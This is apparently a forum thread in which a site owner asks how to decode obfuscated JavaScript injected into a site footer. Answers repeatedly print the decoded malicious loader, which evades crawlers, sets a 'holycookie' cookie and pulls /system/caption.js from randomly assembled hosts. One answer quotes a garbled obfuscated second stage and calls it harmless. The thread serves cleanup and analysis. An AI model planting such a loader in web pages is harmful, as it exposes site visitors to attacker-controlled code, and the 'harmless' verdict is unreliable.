How do I decode some injected JavaScript?

I found the following inserted into the footer of my site and, while trying to solve the big mystery ("How did this happen?"), I am trying to decode it. Any ideas?

Here is the code:

<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%
74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads> 
10 answers

You can decode the string using this tool: set the conversion options to URL and Decode. Then you can run the result through a JS beautifier.

And since I'm curious, I looked at the result. It writes a script tag into your pages that loads a caption.js file from a semi-random domain. There are two arrays of URL segments that are combined to build the full domain, so I would say that you have some work to do.

 <!--
   Decoded form of the injected snippet: the markup that unescape() yields and document.write() inserts into the page.
   Gate: the body runs only when document.cookie has no "holycookie", the lower-cased user agent does not match
   (yahoo|search|msnbot|yandex|googlebot|bing|ask), and the lower-cased navigator.appVersion contains "win"
   (presumably to stay hidden from search-engine crawlers and to reach Windows visitors only).
   Host: one of the 13 prefixes in e is joined to one of the 5 domains in d, each picked with Math.random(), giving 65 possible hostnames.
   Cookie: "holycookie" is set for path=/ with an expiry 9072E4 ms (25.2 hours) ahead, so the same browser fails the gate until the cookie expires.
   Load: document.write() emits a script tag whose src is http:// + prefix + domain + /system/caption.js, so third-party code runs in the page.
   Search terms for cleanup and log review: holycookie, /system/caption.js, and the domain names listed in d.
 -->
 <script language="javascript" type="text/javascript"> var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') }; </script> 

So it prepends a subdomain from e (e.g. vagi.) to a domain name from d (e.g. myads.name) and loads the script at /system/caption.js from that host (e.g. http://vagi.myads.name/system/caption.js).

 // Decoded body of the injected script (the code line below is unchanged).
 // a / c: the visitor's user agent and navigator.appVersion; b: a case-insensitive list of crawler-like names.
 // The if-condition requires all three: no "holycookie" in document.cookie, user agent not matching b,
 // and appVersion containing "win". Anything else leaves the page untouched, which is presumably why
 // the injection is hard to notice from a crawler or a non-Windows machine.
 // d / e: 5 domains and 13 prefixes; f / g: random indexes into them, so the host changes between page loads.
 // dt is assigned without var, so it becomes a global; it holds the cookie expiry, 9072E4 ms (25.2 hours) from now.
 // The cookie write marks this browser, and the final document.write() pulls /system/caption.js from the chosen host.
 var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') }; 

The code picks a random subdomain/SLD combination, sets a cookie, and loads insecure content from the resulting host.


All of these numbers are hexadecimal values for ASCII characters. When unescape is called, they turn into real characters. For example, %3C is '<'.

Why not use a message box to display the result of unescape(...)? That shows the decoded text without writing it into the page.


You can use a hex decoder here: http://home2.paulschou.net/tools/xlate/ The decoded code:

 <!--
   Output of the hex decoder for the injected string (script line unchanged).
   The if-condition skips browsers that already carry the "holycookie" cookie, user agents matching the crawler-like list in b,
   and clients whose navigator.appVersion lacks "win"; everyone else gets a script tag for /system/caption.js
   on a host built from a random entry of e plus a random entry of d.
 -->
 <script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script> 
 <!--
   Another decoded copy of the injected script (script line unchanged).
   Order of operations inside the if-block: choose random indexes f and g, compute an expiry 9072E4 ms (25.2 hours) ahead,
   write the "holycookie" cookie for path=/, then document.write() a script tag pointing at /system/caption.js on the chosen host.
   Because the cookie is written before the tag, a browser that has run this once fails the cookie check on later page views until expiry.
 -->
 <script language="javascript" type="text/javascript"> var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"], e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."], f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date; dt.setTime(dt.getTime()+9072E4); document.cookie="holycookie="+escape("holycookie")+"; expires="+dt.toGMTString()+"; path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; </script> 

Here's the URLDecoder: http://meyerweb.com/eric/tools/dencoder/

And the code that it writes:

 <!--
   URL-decoded payload of the injected string (script line unchanged).
   Three checks gate it: no "holycookie" cookie, user agent not matching the list in b, and navigator.appVersion containing "win".
   The arrays d and e only serve to assemble the hostname; the effect that matters is the final document.write(),
   which makes the page load /system/caption.js over plain http from that hostname.
 -->
 <script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script> 

OK, so this is not too useful. It seems that it adds another JS file if the user does not have a cookie named "holycookie" and is not a search-engine bot such as Googlebot (the code also requires navigator.appVersion to contain "win"). Most of it is just filler for choosing which domain name the payload is loaded from.


The code you posted decodes to:

 // Decoded body of the injected script (the code line below is unchanged).
 // NOTE(review): in this copy the string passed to document.write() is empty. The percent-encoded original
 // in the question ends with a script tag whose src is 'http://' + e[g] + d[f] + '/system/caption.js',
 // so the tag was probably stripped when this listing was rendered; read the last statement with that in mind.
 // Everything before it is the gate (cookie, user-agent and appVersion checks), the random host selection
 // from d and e, and the "holycookie" cookie write with a 9072E4 ms (25.2 hour) expiry.
 var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('') }; 

which in turn loads code from a URL assembled in a pseudo-random manner, provided that the if condition is met.

If you open, for example, http://vain.adsnet.biz/system/caption.js (fetch it as text rather than letting a browser execute it), you will be presented with the following JavaScript code.

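I'll leave the interpretation to you, but it looks completely harmless. Keep in mind that it is obfuscated and this excerpt is incomplete: the lP helper strips filler characters so that g becomes "setTimeout", and the code schedules a call to jh(), which is not defined in the part shown, so the excerpt alone does not show what the script ultimately does.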

 // Second stage as quoted in the answer (the code line below is unchanged). NOTE(review): the listing looks damaged,
 // since the expression assigned to k has an unterminated character class and the braces do not balance,
 // so it will not parse as shown and only part of its behaviour can be read from it.
 // Structure: a constructor tT whose prototype method h holds all the logic; the last statements create an instance and call h().
 // Most declarations (tE, u, zB, vD, gT, cQ, mH, ... and the empty functions) are never used in the visible code and appear to be filler.
 // String.prototype.lP is a thin wrapper around String.prototype.replace, used to strip junk characters from split-up strings:
 //   g = 'sfe?tfTw' + 'irmkeko(' + 'ubty' with the listed characters removed evaluates to "setTimeout".
 // c is window, so c[g](function () { jh() }, 384) is window.setTimeout(..., 384): it schedules jh() after 384 ms.
 // jh is not defined anywhere in this excerpt, so the work actually performed lives in code that is not shown here.
 function tT() {}; var yWP = new Array(); tT.prototype = { h: function () { this.i = ""; var nH = function () {}; var tE = 30295; var u = ""; zB = false; this.a = ''; this.eY = 29407; var z = document; vD = "vD"; var gT = "gT"; var oG = ''; var lF = ''; fU = "fU"; var q = function () { return 'q' }; var c = window; var m = function () { return 'm' }; var kS = "kS"; this.b = ""; this.p = 29430; var j = this; dL = ""; var cC = new Date(); cQ = 33459; var uY = "uY"; var vO = function () {}; zN = "zN"; jIZ = ''; var mH = 21601; String.prototype.lP = function (v, hF) { var t = this; return t.replace(v, hF) }; var nA = ""; this.xK = 48622; zG = ""; var kF = function () {}; function aF() {}; var mI = function () {}; var oY = ''; var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, ''); var iN = new Array(); mJ = "mJ"; aW = "aW"; var hU = "hU"; this.kC = 28044; var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, '')); var cJ = function () {}; var tX = false; this.xHX = false; function jP() {}; var eZ = 16039; bQ = "bQ"; var eSM = new Date(); c[g](function () { jh() }, 384); this.xR = ""; var jB = function () { return 'jB' }; var fP = function () { return 'fP' }; var bX = new Array(); } function iLD() {}; var mQ = function () {}; var wZV = "";this.eK = 5506; } }; fO = 30941; var hW = new tT(); wU = 40956; hW.h(); hZ = "hZ"; 

How could you do it yourself? URLDecode + jsbeautifier or jsunpack is more than enough to get that far ;)


Use version control, so this will not happen in the future; it also lets you diff the live files against a known-good copy and see exactly what was changed. After a good build is completed, and everything is the way you want it, save it to an external hard drive while you are offline.

Have you done something recently to upset an employee who is a programmer?


I used PHP's rawurldecode on it:

  <!--
    Result of running the injected string through PHP rawurldecode (script line unchanged).
    What to look for on an affected site: the cookie name "holycookie", requests for /system/caption.js,
    and any of the hostnames formed from a prefix in e plus a domain in d.
    The script only acts when that cookie is absent, the user agent does not match the list in b, and navigator.appVersion contains "win".
  -->
  <script language="javascript" type="text/javascript"> var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date; dt.setTime(dt.getTime()+9072E4); document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; </script> 
